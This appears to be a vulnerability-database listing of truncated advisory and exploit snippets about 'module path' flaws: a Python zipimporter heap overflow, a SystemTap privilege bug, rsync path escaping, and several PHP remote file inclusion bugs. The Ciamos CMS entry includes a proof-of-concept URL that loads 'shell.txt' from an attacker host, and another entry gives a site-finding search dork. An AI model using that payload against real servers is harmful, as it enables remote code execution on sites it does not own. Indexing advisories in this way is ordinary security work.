python: Heap overflow in zipimporter module

A vulnerability was discovered in Python, in the built-in zipimporter. A specially crafted zip file placed in a module path such that it would be loaded by a later "import" statement could cause a heap overflow, leading to arbitrary code execution...

Ciamos CMS <= 0.9.5 (module_path) Remote File Inclusion Vulnerability

No description provided by source. Discovered by cr4wl3r \ cr4wl3r4tlinuxmaildotorg Ciamos CMS = 0.9.5 modulepath Remote File Include Vulnerability Download Script : http://sourceforge.net/projects/ciamosmodules/files/ Dork : dieHacking attempt; :D Vuln : ./ciamos/modules/pms/index.php line 13 ?p...

PHPNuke Splatt Forum 3.2 Module Path Disclosure Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/7080/info The Splatt Forum module for PHPNuke has been reported prone to a vulnerability which, when exploited, may disclose sensitive path information to a remote attacker. An attacker could use the information gathered ...

Scientific Linux Security Update : systemtap on SL6.x i386/x86_64

SystemTap is an instrumentation system for systems running the Linux kernel. The system allows developers to write scripts to collect data on the operation of the system. It was found that SystemTap did not perform proper module path sanity checking if a user specified a custom path to the uprobe...

DEBIAN-CVE-2011-2502

runtime/staprun/staprunfuncs.c in the systemtap runtime tool staprun in SystemTap before 1.6 does not properly validate modules when a module path is specified by a user for user-space probing, which allows local users in the stapusr group to gain privileges via a crafted module in the search pat...

RedHat Update for systemtap RHSA-2011:1088-01

Check for the Version of systemtap OpenVAS Vulnerability Test RedHat Update for systemtap RHSA-2011:1088-01 Authors: System Generated Check Copyright: Copyright c 2012 Greenbone Networks GmbH, http://www.greenbone.net This program is free software; you can redistribute it and/or modify it under t...

RHEL 6 : systemtap (RHSA-2011:1088)

Updated systemtap packages that fix two security issues are now available for Red Hat Enterprise Linux 6. The Red Hat Security Response Team has rated this update as having moderate security impact. Common Vulnerability Scoring System CVSS base scores, which give detailed severity ratings, are...

Ciamos CMS 0.9.5 Remote File Inclusion

Discovered by cr4wl3r \ cr4wl3r4tlinuxmaildotorg Ciamos CMS PoC : http://server/modules/pms/index.php?modulepath=http://attacker/shell.txt??? 90r0nt4l0 und3r9r0nd c0mmun1ty Gorontalo / 2009...

PT-2007-6140 · Openengine · Openengine

Name of the Vulnerable Software and Affected Versions: openEngine version 1.9 beta1 Description: The issue allows remote attackers to execute arbitrary PHP code via a URL in the this module path parameter in the html/modules/extranet profile/main.php file. However, it is noted that PHP encounters...

WebBuilder 2.0 (StageLoader.php) Remote File Include Vulnerability

Exploit for unknown platform in category web applications ================================================================== WebBuilder 2.0 StageLoader.php Remote File Include Vulnerability ==================================================================...

Rsync < 2.6.3 Sanitize_path Function Module Path Escaping

Binary data 1965.prm...

DEBIAN-CVE-2004-0426

rsync before 2.6.1 does not properly sanitize paths when running a read/write daemon without using chroot, which allows remote attackers to write files outside of the module's path...